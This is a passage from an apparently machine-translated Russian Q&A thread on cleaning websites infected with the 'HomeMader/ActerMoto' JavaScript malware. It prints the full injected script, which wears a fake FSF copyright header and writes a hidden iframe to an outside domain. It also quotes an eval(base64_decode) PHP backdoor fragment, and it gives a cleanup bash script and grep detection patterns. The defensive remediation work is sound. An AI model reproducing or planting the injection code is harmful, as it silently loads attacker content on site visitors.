ИСПРАВЛЕНИЕ: Удалите fsf.org HomeMader / ActerMoto / lusikrators вредоносное ПО JavaScript

Два дня назад я получил этот скрипт поверх всех моих файлов javascript на моих сайтах:

/*
Copyright (C) 2007 Free Software Foundation, Inc. fsf.org
*/
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://milkatures.getonnow.net/briopo;osiue16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).getTime()+64*60*60*1e3);document.cookie="lastshow=1; path=/; expires="+r.toUTCString()}}HomeMader()
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/

После некоторых исследований я получил следующие советы по удалению вредоносного ПО javascript / php с вашего сайта.

  1. Сначала найдите во всех ваших файлах «eval (base64_decode (»), вы найдете файл с именем xm.php (размер: 43 КБ). Возможно, у него есть другое имя на вашем сервере, но он содержит очень локальный код base64 в функции eval ( удалите файл с этим кодом, для получения дополнительной информации о файле см .: http://aw-snap.info/articles/backdoor-examples.php):

Eval (base64_decode ( «Ly80ZDFlZWUyNDNjNTE4ZjFjN2FjNjE4MzdmMDQ3ZjlkYmFhZWE …

  1. Запустите этот скрипт, чтобы удалить все коды javascript из ваших файлов (более подробную информацию о скрипте смотрите: http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/ )

(в этом случае замените REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT, например, HomeMader)

#!/bin/bash
# This script will fix (or try to fix) infected stuff on your server.
# by Andreas Zeller of lux-medien.com - 15.09.2014

NUMBER_OF_LINES=4 ## This is the number of lines that are infected at the top of the file. Notice that this ONLY works if there is a number of lines to be removed on top of the file. Otherwise this script will break stuff.
IDENTIFYING_STRING="REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT" ## This is the string that will identify the infected file. Most scripts add some sort of website or some other UNIQUE string to it. Adjust to your needs.

echo "Trying to fix your shit. Use at your own risk."malicious_list=`grep --include=\*.js -rnl . -e "$IDENTIFYING_STRING"`
if [ -z "$malicious_list" ]
then
echo "Nothing found. You seem to be clean."else
echo "Found `echo "$malicious_list" | wc -l` malicious files..."fi

for filename in $malicious_list
do
echo "Fixing $filename"if [ -f $filename ]
then
sed -i -e 1,"$NUMBER_OF_LINES"d $filename
else
echo "File $filename not found"fi
done
exit

Я не знаю, как добавить файл xm.php на сервер. Но я надеюсь, что это поможет другим людям решить эту проблему. Если вы знаете больше об этом, как его добавить на сервер? Пожалуйста, дайте мне знать!

-2

Решение

Бессмысленно очищать ваши файлы javascript, пока вы не найдете бэкдор php, который делает это возможным.
Поверьте, я трудился над этим неделями!

Вам нужно выполнить поиск grep на всем вашем сервере для следующих строк …

'eval(gzinflate(base64_decode('

а также

'eval(gzuncompress(base64_decode('

а также

'if(!empty($_COOKIE['

он должен возвращать файлы с произвольным именем .php.
Вы должны удалить их, так как это бэкдор, который редактирует ваши файлы javascript (скорее всего, запускается удаленно по прямому URL-адресу с хакерской машины Zombie). Особенно файлы, содержащие

`'if(!empty($_COOKIE['.`
0

Другие решения

Я парень, который написал сценарий выше. Это не только проблема WordPress. Вот как вы смотрите на вредоносный код:

  • используйте find (find. -iname * .php -mtime -3 …) или что-то подобное, чтобы найти файлы, которые были недавно изменены
  • проверить эти файлы на наличие вредоносного кода
  • как сказал человек выше, ИЗОЛИРУЙТЕ что-то вроде base64 …, которое будет уникально идентифицировать эти файлы PHP, а затем использовать функцию grep из опубликованного сценария, чтобы найти все затронутые файлы PHP.

ОЧЕНЬ вероятно, что вы найдете только ОДНУ установку, которая изменила файлы PHP. Вам нужно будет найти, что не так с этой установкой. Проверьте временные метки файлов и проверьте соответствующие журналы ошибок для этого (apache?) Экземпляра.

Если у вас также есть установка Joomla, сделайте себе одолжение и переключитесь на что-то более «профессиональное». Мы предлагали веб-хостинг в прошлом, и теперь он запрещает установку Joomla.

WordPress не так уж и плох, просто постарайтесь не перегружать его плагинами. Чем больше плагинов, тем больше вероятность, что вы что-то поймаете 🙂

Andreas

2

По вопросам рекламы ammmcru@yandex.ru
Adblock
detector